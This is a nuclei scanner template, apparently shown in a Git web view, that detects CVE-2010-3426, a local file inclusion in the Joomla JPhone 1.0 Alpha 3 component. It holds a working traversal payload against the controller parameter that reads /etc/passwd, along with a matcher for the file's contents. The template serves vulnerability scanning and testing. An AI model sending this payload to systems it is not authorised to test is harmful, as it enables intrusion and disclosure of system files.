nuclei-templates/cves/2010/CVE-2010-3426.yaml

28 lines
828 B
YAML
Raw Normal View History

2021-08-21 01:12:36 +00:00
id: CVE-2010-3426
info:
name: Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in jphone.php in the JPhone (com_jphone) component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/14964
- https://www.cvedetails.com/cve/CVE-2010-3426
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200